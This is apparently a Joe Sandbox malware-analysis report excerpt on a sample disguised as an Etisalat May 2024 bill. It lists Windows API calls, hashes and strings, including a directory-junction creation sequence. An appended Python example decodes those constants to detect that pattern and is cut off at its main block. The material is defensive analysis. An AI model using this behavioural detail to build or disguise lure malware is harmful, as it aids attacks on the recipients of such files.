                                      • API String ID: 3215588206-0
                                      • Opcode ID: 4766d3a3aff4c0fb1e3f23d3ffbe41200ab06255f4e7e3d56f8ddddb3ed02243
                                      • Instruction ID: 854e29dbed3450443b666be74d1e2d9da35cc668da3b4e7d3b42b090a15199fd
                                      • Opcode Fuzzy Hash: 4766d3a3aff4c0fb1e3f23d3ffbe41200ab06255f4e7e3d56f8ddddb3ed02243
                                      • Instruction Fuzzy Hash: 64415370E043196ADB209FBA8C4996EFFF8EF51B50B10457FE509E7290DAB89501CE61
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBAAA5
                                      • __swprintf.LIBCMT ref: 00BBAB46
                                      • _wcscmp.LIBCMT ref: 00BBAB59
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BBABAE
                                      • _wcscmp.LIBCMT ref: 00BBABEA
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00BBAC21
                                      • GetDlgCtrlID.USER32(?), ref: 00BBAC73
                                      • GetWindowRect.USER32(?,?), ref: 00BBACA9
                                      • GetParent.USER32(?), ref: 00BBACC7
                                      • ScreenToClient.USER32(00000000), ref: 00BBACCE
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBAD48
                                      • _wcscmp.LIBCMT ref: 00BBAD5C
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00BBAD82
                                      • _wcscmp.LIBCMT ref: 00BBAD96
                                        • Part of subcall function 00B8386C: _iswctype.LIBCMT ref: 00B83874
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: 77dca5ad0f5b9af5bb4ebf650502b64b562e1321509a3705830abe263c1b1e9f
                                      • Instruction ID: f843e8733b7befe1ca402a4a120e68e8449226ac58155337bfa49647d9f56a25
                                      • Opcode Fuzzy Hash: 77dca5ad0f5b9af5bb4ebf650502b64b562e1321509a3705830abe263c1b1e9f
                                      • Instruction Fuzzy Hash: AAA1D071A04246AFD714DF24C884FFABBE8FF04315F0086A9F9A993191DB70E955CB92
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00BBB3DB
                                      • _wcscmp.LIBCMT ref: 00BBB3EC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BBB414
                                      • CharUpperBuffW.USER32(?,00000000), ref: 00BBB431
                                      • _wcscmp.LIBCMT ref: 00BBB44F
                                      • _wcsstr.LIBCMT ref: 00BBB460
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00BBB498
                                      • _wcscmp.LIBCMT ref: 00BBB4A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BBB4CF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00BBB518
                                      • _wcscmp.LIBCMT ref: 00BBB528
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00BBB550
                                      • GetWindowRect.USER32(00000004,?), ref: 00BBB5B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: ca0da896442db529e7e0d42bbd39fbd4b68976b13c01e1ff3f655fe71a222c02
                                      • Instruction ID: 47ecb4a4428cf56dd6fed2487fc35baf3bfa72ec13fabdb7f45db8df35da1912
                                      • Opcode Fuzzy Hash: ca0da896442db529e7e0d42bbd39fbd4b68976b13c01e1ff3f655fe71a222c02
                                      • Instruction Fuzzy Hash: CF81AF710042469FDB10DF10C885FBAB7E8FF54714F0485A9FD868A1A2DBB4DE45CB61
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 37dfb97a5022891b3040c1dae944f6d73c1ef29366a6001343b02b241bcefadd
                                      • Instruction ID: 53c023361b4778d07e8cce3cc3166e2a15e1f42250e35c25bb3539f3d3342e60
                                      • Opcode Fuzzy Hash: 37dfb97a5022891b3040c1dae944f6d73c1ef29366a6001343b02b241bcefadd
                                      • Instruction Fuzzy Hash: DE31A131A44205ABDB14FA60CDA3EFE7BE4EF11B50F6001B9B441710E2EFE5AE44D6A1
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 00BBC4D4
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00BBC4E6
                                      • SetWindowTextW.USER32(?,?), ref: 00BBC4FD
                                      • GetDlgItem.USER32(?,000003EA), ref: 00BBC512
                                      • SetWindowTextW.USER32(00000000,?), ref: 00BBC518
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC528
                                      • SetWindowTextW.USER32(00000000,?), ref: 00BBC52E
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00BBC54F
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00BBC569
                                      • GetWindowRect.USER32(?,?), ref: 00BBC572
                                      • SetWindowTextW.USER32(?,?), ref: 00BBC5DD
                                      • GetDesktopWindow.USER32 ref: 00BBC5E3
                                      • GetWindowRect.USER32(00000000), ref: 00BBC5EA
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00BBC636
                                      • GetClientRect.USER32(?,?), ref: 00BBC643
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00BBC668
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00BBC693
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: 5ffc4c9bd53ceb7b29e59f30e5c8f0716ea7f7fed131d828e1425a6f9637ee0d
                                      • Instruction ID: ed6589eea98fc70c126be231e48cc4c895043ae8730c0c91e96c4ce9ef79fa85
                                      • Opcode Fuzzy Hash: 5ffc4c9bd53ceb7b29e59f30e5c8f0716ea7f7fed131d828e1425a6f9637ee0d
                                      • Instruction Fuzzy Hash: 04514F7190070AAFDB20DFA8DD85BBEBBF5FF04705F004569E686A75A0DBB4A904CB50
                                      APIs
                                      • _memset.LIBCMT ref: 00BEA4C8
                                      • DestroyWindow.USER32(?,?), ref: 00BEA542
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BEA5BC
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BEA5DE
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BEA5F1
                                      • DestroyWindow.USER32(00000000), ref: 00BEA613
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B60000,00000000), ref: 00BEA64A
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BEA663
                                      • GetDesktopWindow.USER32 ref: 00BEA67C
                                      • GetWindowRect.USER32(00000000), ref: 00BEA683
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BEA69B
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BEA6B3
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      • Opcode ID: ab79706590a4679a64a8d71921cbb650dd09971ba0db45ba4bf4ff6ecba00c15
                                      • Instruction ID: 5246fa9090e9af951992f63f8074cbf950fc4047e56ffa7758a1ca3b4d9bfb4f
                                      • Opcode Fuzzy Hash: ab79706590a4679a64a8d71921cbb650dd09971ba0db45ba4bf4ff6ecba00c15
                                      • Instruction Fuzzy Hash: 5D71AF71140285AFD720CF28CC49F7A7BE9FB99704F08456DF9858B2A1DB74E942CB22
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DragQueryPoint.SHELL32(?,?), ref: 00BEC917
                                        • Part of subcall function 00BEADF1: ClientToScreen.USER32(?,?), ref: 00BEAE1A
                                        • Part of subcall function 00BEADF1: GetWindowRect.USER32(?,?), ref: 00BEAE90
                                        • Part of subcall function 00BEADF1: PtInRect.USER32(?,?,00BEC304), ref: 00BEAEA0
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BEC980
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BEC98B
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BEC9AE
                                      • _wcscat.LIBCMT ref: 00BEC9DE
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BEC9F5
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BECA0E
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00BECA25
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00BECA47
                                      • DragFinish.SHELL32(?), ref: 00BECA4E
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BECB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 169749273-3440237614
                                      • Opcode ID: c8c7c1b29ac3893e151b03ac849af57988c9fe35281a26baeee9179b98791327
                                      • Instruction ID: 2585286d17c2f6df377b9fb323f93335776e624e951869498223cea0c48d4e6c
                                      • Opcode Fuzzy Hash: c8c7c1b29ac3893e151b03ac849af57988c9fe35281a26baeee9179b98791327
                                      • Instruction Fuzzy Hash: 2B615971108381AFC711EF64DC85DAFBBE8EF89710F000A6EF591971A1DB709A49CB62
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BE46AB
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BE46F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      • Opcode ID: cb6e534b76f20c9df80839fc0a029165069e50d5654a0eaa90a8ae6ef055e2f3
                                      • Instruction ID: 79f716408ce5ae506b25c8265e6c09146c4a7de742074313042bb31351877512
                                      • Opcode Fuzzy Hash: cb6e534b76f20c9df80839fc0a029165069e50d5654a0eaa90a8ae6ef055e2f3
                                      • Instruction Fuzzy Hash: 08917F742047419FCB14EF11C491AAAB7E6EF95354F0488ECF8965B3A2CB34ED4ADB81
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BEBB6E
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BE9431), ref: 00BEBBCA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BEBC03
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BEBC46
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BEBC7D
                                      • FreeLibrary.KERNEL32(?), ref: 00BEBC89
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BEBC99
                                      • DestroyIcon.USER32(?,?,?,?,?,00BE9431), ref: 00BEBCA8
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BEBCC5
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BEBCD1
                                        • Part of subcall function 00B8313D: __wcsicmp_l.LIBCMT ref: 00B831C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      • Opcode ID: 61c2b14d7069b5ef1876769c203f73ea91d17ac6997e6cc8e3f9f7350595fce6
                                      • Instruction ID: 7366b526ee4866acf19afa68cff2e424b4d885034b601bf616b10288ae207ccc
                                      • Opcode Fuzzy Hash: 61c2b14d7069b5ef1876769c203f73ea91d17ac6997e6cc8e3f9f7350595fce6
                                      • Instruction Fuzzy Hash: B061D171900299BAEB14DF75CC85FBF77E8EB08B11F204295F915DA1D0DB74AA90CBA0
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • CharLowerBuffW.USER32(?,?), ref: 00BCA636
                                      • GetDriveTypeW.KERNEL32 ref: 00BCA683
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA6CB
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA702
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BCA730
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      • Opcode ID: 7512d52acbec9325b7462435e0297aa76c5212954af4f2da4a7778dfce48f796
                                      • Instruction ID: cb95215b5d1b96677177c91fccdfc278b94fbda8b3fe074bd927f6fb06779067
                                      • Opcode Fuzzy Hash: 7512d52acbec9325b7462435e0297aa76c5212954af4f2da4a7778dfce48f796
                                      • Instruction Fuzzy Hash: BC511771104305AFC700EF20C99196AB7F8FF98758F1449ADF896572A1DB35EE0ACB52
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BCA47A
                                      • __swprintf.LIBCMT ref: 00BCA49C
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BCA4D9
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BCA4FE
                                      • _memset.LIBCMT ref: 00BCA51D
                                      • _wcsncpy.LIBCMT ref: 00BCA559
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BCA58E
                                      • CloseHandle.KERNEL32(00000000), ref: 00BCA599
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00BCA5A2
                                      • CloseHandle.KERNEL32(00000000), ref: 00BCA5AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      • Opcode ID: 79a0cc607a17367c1f361129b5630a6f8789510b9e8b4575d2cb7bae7dd5b6a0
                                      • Instruction ID: a9fe32c5897e4aa5f32ac86bca67e2c0a64eebd8c9686ce12f0aefb047e28a0e
                                      • Opcode Fuzzy Hash: 79a0cc607a17367c1f361129b5630a6f8789510b9e8b4575d2cb7bae7dd5b6a0
                                      • Instruction Fuzzy Hash: 1631607590015AABDB219FA0DC89FFB77BCEF88705F1041BAFA08D6160EB7097458B25
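                                       Added example (not part of the Joe Sandbox report and not code from the analysed sample), decoding the constants in the CreateFileW / DeviceIoControl listing above: 0x40000000 is GENERIC_WRITE, 3 is OPEN_EXISTING, 0x02200000 is FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, and 0x000900A4 is FSCTL_SET_REPARSE_POINT. Together with the preceding CreateDirectoryW, the "\??\%s" format string (the NT-path form used as a reparse substitute name) and the RemoveDirectoryW clean-up on the failure path, that is the standard sequence for creating an NTFS directory junction. The parser and helper names below are this example's own; the sample lines are copied verbatim from the block above. Caveat: the reparse buffer itself (and so the reparse tag) is not visible in a static API listing, so the check reports "consistent with a junction", not proof of one.

```python
"""Decode CreateFileW / DeviceIoControl constants from a Joe Sandbox "APIs" block
and check whether the call order matches NTFS junction (reparse point) creation.

Added example; not from the Joe Sandbox report or the analysed sample.
All function names here (parse_api_lines, decode_ioctl, ...) are this example's own.
"""
import re
from typing import Dict, List, Optional, Union

# Constructed input: the API lines of the report block above, copied verbatim.
SAMPLE_APIS = """\
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BCA47A
• __swprintf.LIBCMT ref: 00BCA49C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00BCA4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BCA4FE
• _memset.LIBCMT ref: 00BCA51D
• _wcsncpy.LIBCMT ref: 00BCA559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BCA58E
• CloseHandle.KERNEL32(00000000), ref: 00BCA599
• RemoveDirectoryW.KERNEL32(?), ref: 00BCA5A2
• CloseHandle.KERNEL32(00000000), ref: 00BCA5AC
"""

# One report line: "• Name.MODULE(arg,arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR".
API_LINE = re.compile(
    r"•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

Arg = Union[int, str, None]


def _parse_arg(token: str) -> Arg:
    """'?' means the sandbox could not resolve the value statically; hex tokens become ints."""
    token = token.strip()
    if token == "?":
        return None
    if re.fullmatch(r"-?[0-9A-Fa-f]+", token):
        return int(token, 16)
    return token  # a string literal argument such as tooltips_class32


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the bullet lines of an 'APIs' block into call records ordered as listed."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append({"name": m.group("name"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method      (winioctl.h)
DEVICE_TYPES = {0x7: "FILE_DEVICE_DISK", 0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
KNOWN_CODES = {  # (device type, function number) -> name, from winioctl.h
    (0x9, 41): "FSCTL_SET_REPARSE_POINT",
    (0x9, 42): "FSCTL_GET_REPARSE_POINT",
    (0x9, 43): "FSCTL_DELETE_REPARSE_POINT",
}


def decode_ioctl(code: int) -> Dict:
    """Split a DeviceIoControl control code into its CTL_CODE fields and name it if known."""
    device = (code >> 16) & 0xFFFF
    return {
        "code": code,
        "device_type": DEVICE_TYPES.get(device, hex(device)),
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "access": ACCESS[(code >> 14) & 0x3],
        "name": KNOWN_CODES.get((device, (code >> 2) & 0xFFF)),
    }


GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"),
              (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
              (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
              (0x40000000, "FILE_FLAG_OVERLAPPED")]


def _bits(value: int, table) -> List[str]:
    return [name for bit, name in table if value & bit]


def decode_create_file(args: List[Arg]) -> Dict:
    """args = CreateFileW's seven parameters as listed by the sandbox (None = unresolved)."""
    access, disposition, flags = args[1], args[4], args[5]
    return {
        "access": _bits(access, GENERIC_ACCESS) if isinstance(access, int) else None,
        "disposition": DISPOSITIONS.get(disposition) if isinstance(disposition, int) else None,
        "flags": _bits(flags, FILE_FLAGS) if isinstance(flags, int) else None,
    }


def summarize_reparse_sequence(calls: List[Dict]) -> Dict:
    """is_junction_pattern is True only when, in address order, the listing shows
    CreateDirectoryW, then CreateFileW opened with FILE_FLAG_OPEN_REPARSE_POINT,
    then DeviceIoControl(FSCTL_SET_REPARSE_POINT). The reparse buffer (and so the
    tag: mount point vs. symlink) is not in the listing, so this is 'consistent with'."""
    stage, details = 0, {}
    for c in sorted(calls, key=lambda c: c["ref"]):
        if stage == 0 and c["name"] == "CreateDirectoryW":
            stage = 1
        elif stage == 1 and c["name"] == "CreateFileW":
            details["create_file"] = decode_create_file(c["args"])
            if "FILE_FLAG_OPEN_REPARSE_POINT" in (details["create_file"]["flags"] or []):
                stage = 2
        elif stage == 2 and c["name"] == "DeviceIoControl" and isinstance(c["args"][1], int):
            details["ioctl"] = decode_ioctl(c["args"][1])
            if details["ioctl"]["name"] == "FSCTL_SET_REPARSE_POINT":
                stage = 3
    details["is_junction_pattern"] = stage == 3
    return details


if __name__ == "__main__":
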